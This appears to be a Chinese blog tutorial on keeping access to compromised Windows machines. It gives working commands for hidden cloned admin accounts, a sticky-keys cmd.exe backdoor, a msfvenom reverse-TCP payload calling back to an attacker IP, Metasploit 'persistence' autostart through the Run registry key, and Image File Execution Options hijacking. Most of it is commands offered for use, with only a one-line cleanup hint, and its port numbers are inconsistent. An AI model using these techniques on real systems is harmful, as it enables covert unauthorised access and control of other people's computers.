权限维持

windows 权限维持

一 修改注册表建立隐藏用户

一.环境 windows 2007

CMD命令行下,建立了一个用户名为test$,密码为test的用户,并加入管理员组 ,cMD命令行使用"net user",看不到"test$"这个账号,但在控制面板和本地用户和组是可以显示此用户的。

net user test$ test  /add
net localgroup administrators  test$ /add

在这里插入图片描述首先打开CMD,输入regedt32.exe,进入注册表,然后把名叫:administrator的用户给予:完全控制以及读取的权限,在后面打勾就行,然后关闭注册表编辑器,再次打开即可。
在这里插入图片描述然后来到如下目录,找到test$用户所对应的类型(0x3eb)的文件,如下面箭头所示
在这里插入图片描述
找到administrator所对应的的项为“000001F4”,将“000001F4”的F值复制到“000003EB”的F值中,保存
在这里插入图片描述

分别把test$和“000003EC导出到桌面,保存为test$.rag 和 1.rag .删除test$用户 net user test$ /del

在这里插入图片描述
在这里插入图片描述然后将刚才导出的两个后缀为.reg的注册表项导入注册表中(双击就行了)。这样所谓的隐藏账户就创建好了(这样是克隆管理员账号)。现在重启,不管你是在命令提示符下输入net user 或者在登录界面都是看不到test$r这个账户的,只有在注册表中才能看得到
在这里插入图片描述
现在这个用户还在
在这里插入图片描述

二 shift后门

shift后门是黑客希望以后方便进入服务器而在没有密码的情况下为进入服务器系统而设置的一个后门。
其操作就是在不知道管理员密码的情况下,连续按5次shift键来启动粘滞键,已进入服务器的系统程序管理器。
在这里插入图片描述

move sethc.exe  sethc.exe.bak

copy cmd.exe sethc.exe

这样没登录就能拥有一个cmd
在这里插入图片描述

MSF 反弹shell以及后门

先在服务器中建立一个msf shell

生成exe,想通过webshell等方式传入被攻击机

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.217 LPORT=1256 -f exe >xx.exe

进入msf,监听端口

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.100.217
set LPORT 1218
exploit

在被攻击机中执行xx.exe
在这里插入图片描述

建立后门

在msf后门中执行

run persistence -U -i 10 -p 7898 -r 192.168.100.217

在这里插入图片描述

-i:设置反向连接间隔时间,单位为秒;
-U:设置后门在用户登录后自启动。该方式会在HKCU\Software\Microsoft\Windows\CurrentVersion\Run下添加注册表信息。推荐使用该参数;

-p:设置反向连接的端口号(攻击机端口号);

-r:设置反向连接的ip地址(攻击机iP)。

`

MSF会在目标主机中生成一个vbs文件,并执行

在这里插入图片描述
在这里插入图片描述
然后执行background后台运行
在这里插入图片描述
然后设置LPORT
在这里插入图片描述
执行
在这里插入图片描述一个后门到手
在这里插入图片描述

重启动后任然可以连接
解决办法,删除刚才目录下的vbs;

镜像劫持

所谓镜像劫持,简单地说是程序执行重定向的过程
所谓的镜像劫持,就是在注册表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\ CurrentVersion\Image File Execution Options]处新建一个以杀毒软件主程序命名的项,例如123.exe。然后再创建一个子键“Debugger=C:\WINDOWS\system32\cmd.exe"
在这里插入图片描述在程序中找一个exe(sethc.exe),更名为123.exe,然后双击。弹出cmd.exe

在这里插入图片描述

  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值